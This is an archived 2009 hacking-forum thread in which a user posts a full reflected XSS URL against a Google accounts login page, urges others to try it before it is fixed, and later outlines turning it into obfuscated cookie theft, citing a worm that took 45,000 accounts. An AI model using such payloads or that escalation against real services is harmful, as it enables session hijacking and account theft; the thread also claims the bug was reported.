Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking (http://www.go4expert.com/forums/ethical-hacking-forum/)
-   -   i hacked GOOGLE! (http://www.go4expert.com/forums/i-hacked-google-t16999/)

indiansword 21Apr2009 04:42

i hacked GOOGLE!
 
I gave this title just to get more views to it, i have found another XSS vulnerability in google login pages. Have a look at it before it gets fixed, i have pasted the code below, which you will need to run into your address bar and have fun!

Code:

https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Indian%20Sword%27)%3C%2Fscript%3E&uls=Valider
P.S.:- I've already reported it to google, so it'd be fixed soon.

shabbir 21Apr2009 08:23

Re: i hacked GOOGLE!
 
What will happen when we paste the above code.

indiansword 21Apr2009 09:02

Re: i hacked GOOGLE!
 
lol, r u dbouting me?

i aint gonna steal nothing, if u still dbout then clear your cookies and then check

it will create another MANUAL box in GMAILS main page, as u see it is NOT some PHISHING SH81, because the address starts with "google.com"

shabbir 21Apr2009 09:37

Re: i hacked GOOGLE!
 
No. Just wanted to know the output. I know its Google.com domain l0l

SpOonWiZaRd 22Apr2009 00:12

Re: i hacked GOOGLE!
 
DUDE!! You are the fu**ing master! how did you come about this? great stuff...

indiansword 22Apr2009 00:31

Re: i hacked GOOGLE!
 
glad atleast someone liked it :P

shabbir 22Apr2009 08:39

Re: i hacked GOOGLE!
 
Quote:

Originally Posted by indiansword (Post 46078)
glad atleast someone liked it :P

Even I liked it but I wanted to even know what would be the output as well. Some repu your way

indiansword 22Apr2009 23:52

Re: i hacked GOOGLE!
 
Quote:

Originally Posted by shabbir (Post 46097)
Even I liked it but I wanted to even know what would be the output as well. Some repu your way

You're talking about OUTPUT!?

Right now i made another box below the login box just to make you guyz udnerstand. Now, i can just remove that box and make the gmail the way it usually looks, and at the end i can add a script to steal the cookies and that particular script i can use "charcode[]" and hex the script so no one would understand it.

If you remember the XSS worm in orkut albums, ONLY orkut worm stole more than 45,000 ids just in about 5 hours. And this thing is ENTIRE GOOGLE including adsense,orkut,gmail etc. etc.

yea 1 more thing,
this vBulletin reputation system SUCKS!

shabbir 23Apr2009 08:24

Re: i hacked GOOGLE!
 
Agreed that Google Accounts could be in trouble but I guess they should have fixed it by now but I still see its not.

SpOonWiZaRd 23Apr2009 10:49

Re: i hacked GOOGLE!
 
I see that indiansword likes XSS alot....


All times are GMT +5.5. The time now is 23:19.